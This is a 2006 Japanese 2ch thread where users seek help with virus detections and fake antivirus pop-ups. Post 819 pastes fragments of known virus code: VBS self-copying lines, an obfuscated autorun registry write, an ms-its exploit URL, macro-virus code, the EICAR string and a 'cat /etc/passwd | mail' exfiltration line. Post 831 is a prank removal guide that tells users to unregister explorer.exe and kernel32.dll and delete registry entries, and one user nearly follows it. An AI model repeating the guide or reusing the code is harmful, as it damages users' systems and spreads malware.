出てきませんでした。本当にワームなのでしょうか。
ワームなら完全に駆除したいのですが、
移動できなかったものはどうしたらよいでしょうか。

813 :名無しさん@お腹いっぱい。:2006/04/21(金) 10:57:54
【使用OS】WindowsXP SP1
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】ウィルスバスターコーポレートエディション
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】
 ウィルス名/BKDR_HUPIGON.GEN
 発見場所/C:\WINDOWS\RundllKey.DLL

【別のオンラインスキャンしたならその結果は】
 オンラインスキャンはしていない  

【症状を具体的に、分かる限りすべて書く】
 中国で使用してます。
 パソコンを起動すると、上記ウィルスが発見されたとメッセージがでる。
 また、設定しているウィルスお知らせメールも届く。
 ただし、その後手動検索するとウィルスは1つも発見されない

【何をしたらそんなことになったのか】 突然なのでわからない

【これまでにとった措置】
 ウィルスは発見されないので、スパイウェアの可能性を疑い
 SPYBOTとAD-AWAREでスキャン。 それぞれに発見されたファイルなどは削除した。
 
【その他の質問】
 日本のトレンドマイクロのサイトのウィルスDBにも
 BKDR_HUPIGON.GEN というウィルスはのっていない。 中国だけのウィルス?
 検出されるファイル名が詐称されている可能性もありでしょうか?
 トレンドのサイトで対策が発見できないので、詐称されていても
 方法がわからず、手詰まり状態・・・  どなたか助けてください!!!

814 :名無しさん@お腹いっぱい。:2006/04/21(金) 11:05:17
SP2にしましょう。話はそれから

815 :813:2006/04/21(金) 13:08:52
では、早速SP2にしてみます

816 :名無しさん@お腹いっぱい。:2006/04/21(金) 13:28:40
【使用OS】 WindowsXP HOME SP2
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 avast
【ちゃんとUpdateしてるか】 自動更新してます
【スキャンした結果(ウイルス名・発見場所)】
発見できません
【別のオンラインスキャンしたならその結果は】
していません。
【症状を具体的に、分かる限りすべて書く】
CPUの使用率が100%
タスクマネージャのプロセスを見ると
KB681499.exeが次々と起動しては消えていってます(最大で同時に4個程度動いてます)
TheMatrixHasYou.exeというのも同様に動いているようです
常にカーソルの右側に砂時計が出続けてます(100%だから当たり前かも)
【何をしたらそんなことになったのか】
普通にインターネットにつないでいました
エロサイトも見てました
色々ダウンロードもしました
【これまでにとった措置】
AVASTでウイルスチェック
スパイボットでチェック
発見されたものは移動
幾つか移動できないものがありました。
【その他の質問】

817 :813:2006/04/21(金) 13:30:38
>>814
導入しているシステムの関係上、SP2にできないかも・・・・
どうしよう・・・


818 :名無しさん@お腹いっぱい。:2006/04/21(金) 14:05:55
>>810
つttp://www.mcafee.com/japan/security/virS.asp?v=SysProtect


819 :名無しさん@お腹いっぱい。:2006/04/21(金) 15:28:02
121 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/08/20(土) 03:58:12
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.Copy^^^^File f1.path, f1.path+"l"
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub




820 :名無しさん@お腹いっぱい。:2006/04/21(金) 18:18:31
ウィルスに感染した場合XPのシステムの復元で感染する前に戻しても無駄なの?

821 :813:2006/04/21(金) 19:05:01
やはりSP2にはできません・・・
となると、対策は無理っぽいですか?

822 :名無しさん@お腹いっぱい。:2006/04/21(金) 20:54:00
>>813
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR%5FHUPIGON%2EGEN


823 :名無しさん@お腹いっぱい。:2006/04/22(土) 02:23:14
私も722さん見たいなんなったんですけど…大丈夫なんですかね〜(汗)

824 :813:2006/04/22(土) 09:10:09
>>822
うわーー、あったんですね!
ありがとうございます! 早速対応します。

825 :名無しさん@お腹いっぱい。:2006/04/23(日) 13:13:07
トロイの木馬記事で質問したほうがいいのかもしれませんが、
ウィルス情報質問スレッドなので、こちらにて質問させて頂きます。

ネットゲーム(MMOPRG等)内で、ある(ゲーム)アイテムを買うだけで、
トロイの木馬に感染して、パスやIDを抜かれる事なんてあるでしょうか?

また、ここで質問は場違いかもしれませんが、
例えば、MMOPRGで、IDやパスを抜いて、
簡単に相手のキャラクター等をのっとる(垢ハク)事はできますでしょうか?
もしくは、簡単にID表示なんてみれるものなんでしょうか?

yahoo検索等で、調べたら、下記URLのような記事がでてきてはいるのですが、
ttp://blog.hitachi-system.co.jp/01/132.html?ad_id=rss
そこまでして、ゲームのキャラを乗っ取るという人もいるのでしょうか?


826 :名無しさん@お腹いっぱい。:2006/04/23(日) 16:21:33
むこうで質問しろ

827 :名無しさん@お腹いっぱい。:2006/04/23(日) 17:13:42
Back door.Agent.acっていうウィルスがでてきたんですがこれは危険ですか?

828 :名無しさん@お腹いっぱい。:2006/04/23(日) 18:32:35
一般的には危険です

829 :名無しさん@お腹いっぱい。:2006/04/23(日) 21:27:33
このウィルスに感染してる場合パソコンはどうなりますか?

830 :名無しさん@お腹いっぱい。:2006/04/23(日) 22:17:59
一般的には困った事になる

831 :名無しさん@お腹いっぱい。:2006/04/23(日) 22:38:18
>>827
大丈夫!次に書いてあることをやれば駆除できる。
1.スタート→検索→フォルダやファイルの検索
2.探す場所がc:\またはローカルハードドライブになっていることを確認
3.サブフォルダも探すの欄に印が付いているのを確認
4.kernel32.dllを検索する
5.見つかった場合はVBS_KERNEL32.Aというウイルスに感染しています
6.このウイルスはexplorer.exeに感染することによりメモリに常駐します
7.このウイルスを駆除するには特殊な方法を使います。
8.スタート→ファイルを指名して実行
9.regsvr32 /u explorer.exeと入力してOKをクリック
10.regsvr32 /u kernel32.dllと入力してOKをクリック
11.速やかにPC再起動
12.スタート→ファイルを指名して実行
13.regeditと入力してOKをクリック→レジストリエディタが開く
14.編集→検索をクリック
15.explorer.exeとkernel32.dllを検索する
16.見つかった物を全部削除
17.検索が終わったら速やかにPC再起動
18.問題解決!!{効果が無いときはセーフモードで8〜17を実行}

俺はこの方法でVBS_REDLOF.Aと、WORM_BADTRANS.Bを駆逐できたよ。

832 :名無しさん@お腹いっぱい。:2006/04/23(日) 22:51:56
kernel32.dllがc:\windows\system32\から見つかったのですが
>>831は実行すべきでしょうか?

【使用OS】 XPSP1
【WindowsUpdateしてるか】 ちゃんとしている・SP2は不具合が出たので入れてない
【AntiVirusは何を使っているか】 AVG
【ちゃんとUpdateしてるか】 やってる
【スキャンした結果(ウイルス名・発見場所)】 なし
【別のオンラインスキャンしたならその結果は】 なし
【症状を具体的に、分かる限りすべて書く】 とくになし
【何をしたらそんなことになったのか】 831に書かれているkernel32.dllを検索したらHITした
【これまでにとった措置】 これからどうしよう
【その他の質問】 831の方法でこのウイルスは駆除できますか?

833 :名無しさん@お腹いっぱい。:2006/04/23(日) 23:05:02
>>827
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_AGENT.AC
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FAGENT%2EAC&VSect=Sn
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=jp-29286


834 :名無しさん@お腹いっぱい。:2006/04/23(日) 23:41:36
みなさんありがとうございました。

835 :名無しさん@お腹いっぱい。:2006/04/24(月) 21:28:20
容量がすぐにいっぱいになってしまいます。
消しても消しても容量がいっぱいですの警告が出て
実際容量が勝手に増えていきます。
これはやっぱりウイルスでしょうか?

836 :名無しさん@お腹いっぱい。:2006/04/24(月) 23:07:59
【使用OS】 WindowsXP SP1
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 avast!
【ちゃんとUpdateしてるか】している
【スキャンした結果(ウイルス名・発見場所)】TROJ_DELF.BCl
【別のオンラインスキャンしたならその結果は】オンラインのバスターで上記の物が検出した
【症状を具体的に、分かる限りすべて書く】今のところない。判らない。
【何をしたらそんなことになったのか】判りません
【これまでにとった措置】TROJ_DELF.BClで検索してもまったく情報がなく困っております。
【その他の質問】

今、オンラインのバスターをかけてみた所
TROJ_DELF.BCl というものが引っかかってしまいました・・。

場所は、CドライブのWINDOWSのsystem32\ SVKP.sys というものです。

そのファイルのプロパディをみると
4.0.1381.1 SVKP driver for NT Copyright (C) Microsoft Corp. 1981-1999
と書いてあります。

どう対処したらいいのかわかりません。
どうかお助けください。お願いいたします。

837 :名無しさん@お腹いっぱい。:2006/04/24(月) 23:19:54
>>836
奇遇だな。俺もさっきそれ検出して色々調べてるんだわ。
感染源なんだろうなぁ

838 :名無しさん@お腹いっぱい。:2006/04/24(月) 23:35:14
>>836
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_RBOT.CBD&VSect=T
ワームは、<Windowsシステムフォルダ>※に "SVKP.SYS" というファイルを作成します。

839 :名無しさん@お腹いっぱい。:2006/04/25(火) 01:45:45
>>838
ありがとうございます。この状態にはなってませんでした。
>>837
何か詳細判りましたか?

840 :837:2006/04/25(火) 01:56:43
>>839
レジストリいじられた形跡はなかったしよくわからんね。
いつ感染したか心当たりある?

841 :836:2006/04/25(火) 02:29:10
全く判らないです。
AVAST!で SVKP.sys をスキャンしても反応しませんでした。

842 :名無しさん@お腹いっぱい。:2006/04/25(火) 02:31:39
ttp://www.symantec.com/region/jp/securitycheck/
念のためノートンのオンラインスキャンもしてみたら?

843 :836 :2006/04/25(火) 05:06:14
>>842
今終わりましたが
ノートンで検出されませんでした。
なんだろ


844 :名無しさん@お腹いっぱい。:2006/04/25(火) 08:27:58
moo.ru/temp/kane.jpg
↑これ踏んだらtelnetブラクラだったんですけど、
検索してみると「ウイルスだ」と言われているのを見かけました。
どういう種類のウイルスでtelnet以外に何をするのかの情報が欲しいのですが
わかりますでしょうか。

845 :名無しさん@お腹いっぱい。:2006/04/25(火) 08:46:09
しない。ブラクラのスクリプトをウイルスとして検出してるだけ

846 :名無しさん@お腹いっぱい。:2006/04/25(火) 08:47:39
ありがとう

847 :名無しさん@お腹いっぱい。:2006/04/25(火) 08:53:13
信用できないなら「Hacktool.DoS」とか「DoS-iFrameNet」で検索

848 :名無しさん@お腹いっぱい。:2006/04/25(火) 15:01:57
エロサイトでトロイに感染したのですが
PCからウィルスを駆除しようとしたらライトプロテクトにより駆除も隔離も削除もできません
と表示されるのですが、どうすればいいのでしょうか?教えてください。
ウィルスソフトはマカフィーです。よろしくお願いします。

849 :名無しさん@お腹いっぱい。:2006/04/25(火) 15:17:56
>>848
何てトロイか、名前くらい書け。

850 :名無しさん@お腹いっぱい。:2006/04/25(火) 15:18:35
ttp://www.mcafee.com/japan/security/DisableSysRestore.asp
これで解決できますか?

851 :名無しさん@お腹いっぱい。:2006/04/25(火) 15:20:27
>>849
すいません。
FakeAlert-C Generic downloader.f という奴です。

852 :名無しさん@お腹いっぱい。:2006/04/25(火) 19:06:47
【使用OS】 WindowsXP
【WindowsUpdateしてるか】 していなかった
【AntiVirusは何を使っているか】 マカフィー
【ちゃんとUpdateしてるか】上記
【スキャンした結果(ウイルス名・発見場所)】 ■Antinny、HTML_CRINET.A
【別のオンラインスキャンしたならその結果は】ウイルスバスターで上記
【症状を具体的に、分かる限りすべて書く】Cドライブの容量がすぐにいっぱいになってしまいます。
消しても消しても容量がいっぱいですの警告が出て実際容量が勝手に増えていきます。
【何をしたらそんなことになったのか】不明
【これまでにとった措置】お試し期間のウイルスバスター2006などもかけてみた。
【その他の質問】

853 :名無しさん@お腹いっぱい。:2006/04/25(火) 19:34:08
>>852
ああもうおしまい さようなら〜

854 : ◆N9P3SuvBPo :2006/04/25(火) 19:38:35
>848>851
>ライトプロテクトにより駆除も隔離も削除もできません
場所はもしかして「Temporary Internet Files」?

>852
>【スキャンした結果(ウイルス名・発見場所)】 ■Antinny、HTML_CRINET.A
>【何をしたらそんなことになったのか】不明

なんてコメントしたらいいのか…

855 :名無しさん@お腹いっぱい。:2006/04/25(火) 19:41:14
>なんてコメントしたらいいのか…

   帰れ!!                この一言でよろしい

856 :852:2006/04/25(火) 19:57:34
この症状がウイルスに関係しているか知りたいんです。
それがわからないことには
>【何をしたらそんなことになったのか】
には書けないでしょ。

もし書けたならむしろその時点で答えは出るじゃないですか。

857 :名無しさん@お腹いっぱい。:2006/04/25(火) 20:03:47
  帰れ!!

858 : ◆N9P3SuvBPo :2006/04/25(火) 20:05:02
>856
はぁ〜
「何やったら感染したのか」っていうの、何となく分かりますが。

>Antinny
このAntinnyというウイルスの感染経路はご存知ですか?

>【症状を具体的に、分かる限りすべて書く】Cドライブの容量がすぐにいっぱいになってしまいます。
>消しても消しても容量がいっぱいですの警告が出て実際容量が勝手に増えていきます。
えーっと以下当たってるかな?
どこかに、数GBのtxtファイルが作成されているんじゃ。

859 :名無しさん@お腹いっぱい。:2006/04/25(火) 20:45:56
@しらを切る
  やってない。知らない。ただの小麦粉です。
A陰謀説
  家族や友人が勝手につこうた。
B逆ギレ
  そっちが勝手に勘違いしたニダ。

860 :852:2006/04/25(火) 20:46:23
>>858
Windows XP(C:)ってとこみたら
合計2174GB、空き容量1.51MBって出たからここにあるのは間違いないと思うんだけど
見つかんない・・・。
引き続き探しますが。

861 :名無しさん@お腹いっぱい。:2006/04/25(火) 20:58:54
>>860
>>1
Winny関連のウィルスは、Download板に専門スレッドがあります。

出て行け。

862 :名無しさん@お腹いっぱい。:2006/04/25(火) 21:07:11
>>860
なんか変なexeファイルを実行したのでは?

863 : ◆N9P3SuvBPo :2006/04/25(火) 21:11:15
>860
見つからんのなら、別にいいよ。
単に俺の予想が外れただけだし。
でも、あなたの「容量がいっぱいになる」といった症状は、間違いなくウイルスだから。

>862
それしか思い浮かばんだろフツーわ

864 :852:2006/04/25(火) 22:03:15
そうですか・・・。
txtがウイルスだった場合ってちゃんと
スキャンでひっかがりますかね?

865 :848:2006/04/25(火) 22:03:15
テンプレあったのねすいません。
>>854 場所は_RESTOREでした。他は普通に駆除できました。解決しましたありがとうございます。

866 :名無しさん@お腹いっぱい。:2006/04/25(火) 22:06:28
>>864
>【スキャンした結果(ウイルス名・発見場所)】 ■Antinny、HTML_CRINET.A

これを発見したんじゃないの?
Antinnyにもいろんなのがあるらしいからね

867 :852:2006/04/25(火) 22:10:47
ウイルスバスター2006じゃAntinnyなどがひっかから無いので
心配で心配で。
他のオンラインスキャンでは見つかったのに。

868 :名無しさん@お腹いっぱい。:2006/04/25(火) 22:17:03
都合の悪い部分はスルーなんだな

869 :名無しさん@お腹いっぱい。:2006/04/25(火) 22:21:22
なに、こっちも大事なとこだけ放置すればすむ

870 :名無しさん@お腹いっぱい。:2006/04/25(火) 22:30:08
ちょっと聞きたいコトがあるんですが・・・
この間から「Remove Toolbar」というツールバーが表示されていて、検索したらスパイウェアの1つみたいなんですが、対策サイトを見ると駆除のやり方は書いてあるんですが、難しくて理解できないんです。。
誰か分かりやすく駆除のやり方教えていただけませんか?
お願いします(ι´・ω・`;)

871 :名無しさん@お腹いっぱい。:2006/04/25(火) 22:43:33
>>870
SpyBotやAd-Aware SEは試したの?

872 : ◆N9P3SuvBPo :2006/04/25(火) 22:58:23
>865
_RESTOREってシステムの復元のところかな?
マカフィー使っているんなら、一応全ドライブスキャンしておくと良いよ。

>864
感染の元となったファイルが、アイコンや拡張子を偽装したファイル。
このファイルから検出されたんだと思う。
パソコン初期化or電気屋に持って行ってリカバリが確実。

>870
対策サイトは「アダルトサイト被害対策の部屋」?
思い切ってそこで質問してみたら?

873 :名無しさん@お腹いっぱい。:2006/04/25(火) 23:07:13
>>871
今やってみます!!
教えてくれてありがとうございます★★

874 :名無しさん@お腹いっぱい。:2006/04/25(火) 23:11:59
http://www.google.co.jp/search?hl=ja&q=www.doubleh.fr/audio/index.htm&btnI=I%27mFeelingLucky&Ir=

これ踏んでしまった・・
そしたらマカフィーが反応して
トロイの木馬が検出されました、ファイル「sploit[1].anrからウィルスを駆除できませんって表示された
PCあんまり詳しくなくてどうすればいいのか素でわからない状態です・・・
アドバイスどうかよろしくお願いします

875 :名無しさん@お腹いっぱい。:2006/04/25(火) 23:28:32
>>874
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML%5FMHTREDIR%2EM&VSect=Sn
これと同じものらしい。
対応も同じで良いのでは?

876 :874:2006/04/26(水) 00:09:36
>>875
レス感謝します

そこのサイトのを見ると
・感染していた場合の対処:
 特にシステム改変などは行ないませんので単純に最新のウイルス対策プログラムを利用して
ウイルス検索を行い「HTML_MHTREDIR.M」として検出したファイルをすべて「削除」してください。
全ドライブ検索を行い何も検出されなければ、処理は完了です。

って書いてあるけど
削除しようとすると
sploit[1].anrからウィルスを削除できません
ファイルが書き込み保護されていないことを確認してから、再実行してください。
って表示される・・・

877 :名無しさん@お腹いっぱい。:2006/04/26(水) 03:40:11
>>876
そうかよ 当然ブラウザなんて起動していない状態なんだよな

878 :名無しさん@お腹いっぱい。:2006/04/26(水) 07:17:47
自宅のパソコンがトロイに感染してしまいました

一応削除はできたのですが、
これで大体OKなのか再セットアップしたほうがいいのかわかりません
感染ファイルごと削除したので…

セキュリティはマカフィー2004FWとアンチウィルスを入れています。
7個くらいきたうちの4つは駆除できて3つは感染ファイルごと削除しました
(感染ファイルには.SEARCHという文字が入っていて、すべて同じトロイだったのでそのとき検索していたGoogle?)

それでも起動が極端に重くなってしまっていたので、
Macfeeアンインストール
NOD32体験版インストール→Search(アクセスできないファイル以外異常なし)
Spybot→Search(異常あり・一部削除)
Trojan Remover体験版→Search(異常なし)
セーフモード
NOD32体験版→Search( 〃 )
Spybot→Search(異常あり・残り削除)
Trojan Remover体験版→Search(異常なし)
インターネットオプション→一時ファイルの削除
で実行しました

大方戻ったのですがまだ起動が少し遅い気がします。(気のせい?)
このあとシステムの復元とかすれば感染する以前の状態に戻せますか?
それともやはりリカバリしないとだめですか?
一昨日メーカー修理から戻ってきてXP SP2適用済になっていたので
できればリカバリしたくないのですが…

長くなってすみません
よろしくおねがいします


879 :名無しさん@お腹いっぱい。:2006/04/26(水) 08:21:47
>>878
知らん ProcessExplorerでも起動して感染しているか自分で判断出来ないレベルならリカバリー
トロイとは基本的にほとんどがスパイウェア扱いだ
だから、ウィルス対策ソフトで完全除去は不可能

880 :名無しさん@お腹いっぱい。:2006/04/26(水) 08:27:44
ノートン 定義最新 隔日で完全スキャン
しかしPGによれば何かがポート1024〜5000から外に向けてランダム開放してるもより
このタイプでスキャンにかからないウイルスってなんでしょうかと

881 :名無しさん@お腹いっぱい。:2006/04/26(水) 08:33:31
テンプレあった

【使用OS】xphome
【WindowsUpdateしてるか】y
【AntiVirusは何を使っているか】ノートン06
【ちゃんとUpdateしてるか】y
【スキャンした結果(ウイルス名・発見場所)】なし
【別のオンラインスキャンしたならその結果は】なし
【症状を具体的に、分かる限りすべて書く】
起動中ずーっと1024-5000のポートを順番に開けてるみたい
送信先はランダムでポートは7864 30000 1353など
【何をしたらそんなことになったのか】やっぱnyかな ノートンはDL購入の正規品
【これまでにとった措置】スキャンのみ

882 :名無しさん@お腹いっぱい。:2006/04/26(水) 08:35:10
>>879
レスありがとうございます
やってみます

883 :名無しさん@お腹いっぱい。:2006/04/26(水) 08:40:23
>>880
アホが

884 :名無しさん@お腹いっぱい。:2006/04/26(水) 11:38:16
>>880
>1

885 :名無しさん@お腹いっぱい。:2006/04/26(水) 12:18:24
リアルタイム検索で「TORJ_KAKKEY.S」が検出されました。
ウイルスバスター2006 XPSP2使用。
隔離したんですが駆除はできませんでした。
感染ファイルを削除しようとしたのですが、感染ファイルが見つからず。
その後一回ウイルス検索してみたんですが、検出されませんでした。
これはどういうことですか。隔離してるから検出されないんでしょうか。

886 :名無しさん@お腹いっぱい。:2006/04/26(水) 14:04:04
>>885
ダウソ版池

887 :名無しさん@お腹いっぱい。:2006/04/26(水) 14:38:27
870の者ですがスパイウェア駆除できました★★
レスくださった方のおかげです(●〃ω〃)
本当にありがとうございました★

888 :813:2006/04/26(水) 16:18:46
ずいぶん以前に質問した813です。

BKDR_HUPIGON.GEN というウィルスらしいです。
で、822さんに
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR%5FHUPIGON%2EGEN
を教えてもらって対処したのですが、これに書かれているレジストリがありません。
でも、毎日ウィルスバスターは下記のメールを送ってきます。
メールに載っているファイルもありません。
------------------
Virus Alert!!
BKDR_HUPIGON.GEN is detected on PC1 in Workgroup domain.
Infected file: C:\WINDOWS\RundllKey.DLL
Detection date: 2006.04.23 13:23:22
Action: Virus successfully detected, cannot perform the Clean action (Delete)
------------------

他に何かすることはありますか?
あーー、もう本当にどうすればいいのか・・・

スパイウェアはSPYBOTとad-awareを使っています。

889 :名無しさん@お腹いっぱい。:2006/04/26(水) 16:22:01
クリーンインスコ

890 :名無しさん@お腹いっぱい。:2006/04/26(水) 16:49:18
そのファイル名でレジストリ検索すりゃいいじゃん

891 :813:2006/04/26(水) 17:39:35
>>889
それは最後の手段ですね・・ なるべくしたくないなーー

>>890
かりに、検索でひっかるものがあったとして、
単純にそれを削除してしまって大丈夫なものでしょうか?
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR%5FHUPIGON%2EGEN
にのっていた改変レジストリとして
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services\mchInjDrv
があるのですが、この場所にこれはなく検索すると
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_mchInjDrv がありました。
バックアップもとっていたので、これを削除してみたのですが削除できないというエラーになりました。
この中の値のデータにmchInjDrvとつくものがあったので、これも削除ができず名前変更だけしておきました。
まぁ、結果は同じだったんですけど・・・

892 :813:2006/04/26(水) 17:40:28
>>890
とにかく一度、ファイル名で検索してみます

893 :名無しさん@お腹いっぱい。:2006/04/26(水) 19:17:09
再インスコする覚悟がない奴はny使うなハゲ
というかバックアップぐらいしろよ


894 :名無しさん@お腹いっぱい。:2006/04/26(水) 19:30:31
数日間も悩んだり試行錯誤してるくらいならさっさとクリーンインスコした方がよっぽどマシ。

895 :名無しさん@お腹いっぱい。:2006/04/26(水) 21:43:15
136 :名無しさん@お腹いっぱい。:2006/04/26(水) 21:11:22
まゆまゆ のブログ
http://blog.livedoor.jp/eroero00/


株板でこれクリックしたら突然ブルースクリーンになってしまったんですが
ウィルスでしょうか?もしそうなら情報が漏れるような危険なウィルスでしょうか?
対処法を教えてください。

896 :名無しさん@お腹いっぱい。:2006/04/26(水) 22:00:35
>>895
たぶん大丈夫な気がする。

897 :名無しさん@お腹いっぱい。:2006/04/26(水) 22:04:09
>>896
それがウィルスかどうかどうやって判断できるのでしょうか?

898 :名無しさん@お腹いっぱい。:2006/04/26(水) 22:06:38
>>897
根拠は勘です(w

ソースチェックしたり、グーグルのキャッシュを見たりしたけど
別に変な感じじゃなかったから。

899 :名無しさん@お腹いっぱい。:2006/04/26(水) 22:16:16
ありがとう。

900 :名無しさん@お腹いっぱい。:2006/04/26(水) 22:18:32
そして900

901 :名無しさん@お腹いっぱい。:2006/04/26(水) 23:51:19
お初です。
自分のパソコンに入っているウィルス対策ソフトは
買った時から事前に入っているやつだけだったのですが、
さっき外国のサイトに入った途端、「新規のウィルスが検出されました」
という表示が出ました。
「高危険度」とか出てビビっているのですが、
有料のアンチウィルスソフトを落とせば解決するのでしょうか?
今は携帯から書き込んでいますが、マジでビビっています。

902 :名無しさん@お腹いっぱい。:2006/04/26(水) 23:55:28
>>901
http://pc8.2ch.net/test/read.cgi/sec/1143972325/
WinAntiVirus Pro 2006


まさか↑これじゃないよね?

903 :名無しさん@お腹いっぱい。:2006/04/27(木) 00:03:36
>>902
まだ何もしていません
放置してます。

904 :名無しさん@お腹いっぱい。:2006/04/27(木) 01:10:29
>>902
ってよく調べてみたら自分がダウソしようと思っていたのはそれです!
危うく押し売りに騙されるとこでした。サンクス

905 :名無しさん@お腹いっぱい。:2006/04/27(木) 01:52:22
何度も書き込みすみませんが、具体的にウィルスバスターのソフトは
いくら位するものなんでしょうか?

906 :名無しさん@お腹いっぱい。:2006/04/27(木) 02:02:27
>>905
ttp://shop.vector.co.jp/service/servlet/Catalogue.Detail.Top?ITEM_NO=SR069840
ダウンロード版で4620円


パッケージ版だと5000〜6000円ぐらい

907 :名無しさん@お腹いっぱい。:2006/04/27(木) 02:14:14
おい、マルチは放置がルールだぜ

908 :名無しさん@お腹いっぱい。:2006/04/27(木) 02:42:57
マルチじゃなくても放置すべきだろ

909 :名無しさん@お腹いっぱい。:2006/04/27(木) 02:48:17
自演?

910 :名無しさん@お腹いっぱい。:2006/04/27(木) 07:08:40
>>906
高い・・・
ありがd

911 :813:2006/04/27(木) 09:30:39
>>893
nyって、winnyでしたっけ?
使ってませんよ。バックアップはわかりませんが。
何せ自分のPCではなく、中国の関連会社のもので・・・

>>894
自分のPCとか、社内のPCならとっとと再インストールやってしまうんですが・・・
当該PCに特殊なソフトウェアが入っていることと(自分はそれをしらないんですが)
中国に再インストールして、その特殊なソフトを使える状態までもどせるか・・・
という不安がありまして。

ご意見伺っていますと、再インストールしか方法がなさそうですね。

912 :名無しさん@お腹いっぱい。:2006/04/28(金) 02:17:07

【使用OS】 Win XP2
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 マカフィー
【ちゃんとUpdateしてるか】 してる(はず、自動)
【スキャンした結果(ウイルス名・発見場所)】 未処置
【別のオンラインスキャンしたならその結果は】 未処置
【症状を具体的に、分かる限りすべて書く】
    http://up.kabubu.net/cgi/img2/5690.jpg
    こんなのが突然表示されました。

    タイトルみるとマカフィーじゃなさそうだし・・・
【何をしたらそんなことになったのか】
    http://windowsmedia.com/radiotuner/MyRadio.asp 
    メディアプレーやでラジオサイトを聞いていた
    ラジオステーションガイドのビッグバンド/スイング ジャンルを選択して
    トップにあった1.FM−Bluesを聞いていたような気がします・・・
【これまでにとった措置】
    PCに対してなにもしていない
    アップローダーを探した
    情報収集:ここへきました。
【その他の質問】
    どう対処したらいいですか?

913 :名無しさん@お腹いっぱい。:2006/04/28(金) 02:22:20
インチキスパイウェアソフトのサイトがポップアップで開いただけ
そのサイトからダ゙ウンロードしたりしてなかったら問題なし
こっちのスレにいろいろ書いてる

WinAntiVirus Pro 2006
http://pc8.2ch.net/test/read.cgi/sec/1143972325/

914 :名無しさん@お腹いっぱい。:2006/04/28(金) 02:23:09
おk、脱字

インチキアンチスパイウェアソフトのサイトがポップアップで開いただけ
そのサイトからダ゙ウンロードしたりしてなかったら問題なし
こっちのスレにいろいろ書いてる

WinAntiVirus Pro 2006
http://pc8.2ch.net/test/read.cgi/sec/1143972325/

915 :912:2006/04/28(金) 02:24:28
今 >>902 のスレ読んでるところです(~_~;)

結果として、ポップアップを消して無視してれば良いのでしょうか?


916 :912:2006/04/28(金) 02:25:21
>>913
>>914
即効で、ありがとうございます。

917 :名無しさん@お腹いっぱい。:2006/04/28(金) 02:51:31
>>915
うm、大丈夫。
そのスレでダウンロードしただけで消せなくなったとか言ってる人がいたけど、どうも信用できない

918 :名無しさん@お腹いっぱい。:2006/04/28(金) 12:52:28
#極悪非道のageブラザーズ
漏れら極悪非道のageブラザーズ!
今日もネタもないのにageてやるからな!
 ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ∧_∧   ∧_∧    age
 (・∀・∩)(∩・∀・)    age
 (つ  丿 (   ⊂) age
  ( ヽノ   ヽ/  )   age
  し(_)   (_)J

919 :名無しさん@お腹いっぱい。:2006/04/28(金) 13:11:19
強者発見したぞ。
http://pc8.2ch.net/test/read.cgi/pcqa/1141370819/462-465/

920 :名無しさん@お腹いっぱい。:2006/04/28(金) 13:34:28
datが存在しません。削除されたかURL間違ってますよ。

921 :名無しさん@お腹いっぱい。:2006/04/28(金) 19:14:30
466 名前:ひよこ名無しさん[sage] 投稿日:2006/04/28(金) 12:45:22 ID:???
   エロサイトを見てオナったまで読んだ


922 :名無しさん@お腹いっぱい。:2006/04/28(金) 20:57:35
.avi等の動画ファイルにウィルス仕込んで再生したら
ウィルス発動みたいな事ってできるんですか?

923 :名無しさん@お腹いっぱい。:2006/04/28(金) 22:03:41
>>922
散々既出

924 :名無しさん@お腹いっぱい。:2006/04/29(土) 11:51:17
使用OS】 XP SP2
【WindowsUpdateしてるか】 してます。
